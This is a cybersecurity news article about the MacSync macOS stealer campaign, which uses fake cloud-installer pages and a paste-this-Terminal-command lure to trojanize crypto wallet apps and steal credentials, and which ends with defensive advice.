Ddos 
A sophisticated new malware campaign is targeting macOS users with a lethal combination of social engineering and technical stealth. Dubbed MacSync, this “Malware-as-a-Service” (MaaS) tool masquerades as a legitimate cloud storage installer to trick users into infecting their own machines, specifically hunting for cryptocurrency wallets and credentials.
The campaign, uncovered during routine threat hunting, employs a “ClickFix” lureβa tactic where victims are coerced into pasting a malicious command into their terminal to “fix” a fake error or complete an installation.
The infection begins on sites designed to look like trusted download portals. In one observed case, a domain “mimicking a Microsoft login page” redirected users to a site disguised as a “legitimate macOS cloud storage installer”.
Instead of downloading a file, the site instructs “advanced users” to perform a “Terminal installation.” “The page coerced users into copying and pasting a deceptive Terminal command,” the report explains.
This command, a seemingly benign one-liner, actually fetches a remote script that bypasses macOS security features like Gatekeeper and notarization. “By convincing victims to voluntarily execute malicious shell commands, attackers completely bypass Gatekeeper, notarization checks, and signature verification”.
Once inside, MacSync doesn’t just steal data; it digs in for the long haul. The malware is designed to “conditionally trojanize widely used Electron-based cryptocurrency applications” found on the victim’s machine.
By overwriting critical components of apps like Ledger Live or Trezor Suite, the malware transforms trusted hardware wallet companions into phishing tools. “The primary goal of both trojanized applications is to present a convincing multi-step phishing wizard that captures device PINs and full recovery phrases”.
Victims might see a helpful “Something went wrong…” screen weeks after the initial infection, prompting them to re-enter their recovery phrase to “fix” the issueβhanding over the keys to their crypto assets in the process.
MacSync is marketed as a budget-friendly option for cybercriminals. “Marketed as an affordable Malware-as-a-Service offering on underground forums, MacSync has gained traction among lower-tier affiliates due to its low price point”.
Despite its low cost, its capabilities are advanced. It systematically harvests “browser credentials, cryptocurrency wallet data, Keychain contents, and sensitive files,” making it a potent threat to individual users and organizations alike.
The report concludes with a warning: technical defenses can only go so far against social engineering. “MacSync proves that on macOS, the most dangerous malware isn’t the one that exploits a zero-day, it’s the one that exploits trust”.
The best defense remains simple: “never paste random commands into Terminal, no matter how ‘official’ they look”.
Related Posts:
- The Notarized Nightmare: New MacSync Stealer Bypasses Gatekeeper to Hijack Mac Devices
- macOS Threat: AppleScript (.scpt) Files Emerge as New Stealth Vector for Stealer Malware
- EU Launches DMA Probes: Is Gatekeeper Status Next for AWS & Azure Cloud?
- Beyond Cracked Apps: New macOS Malware Is Using the Terminal to Steal Data
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
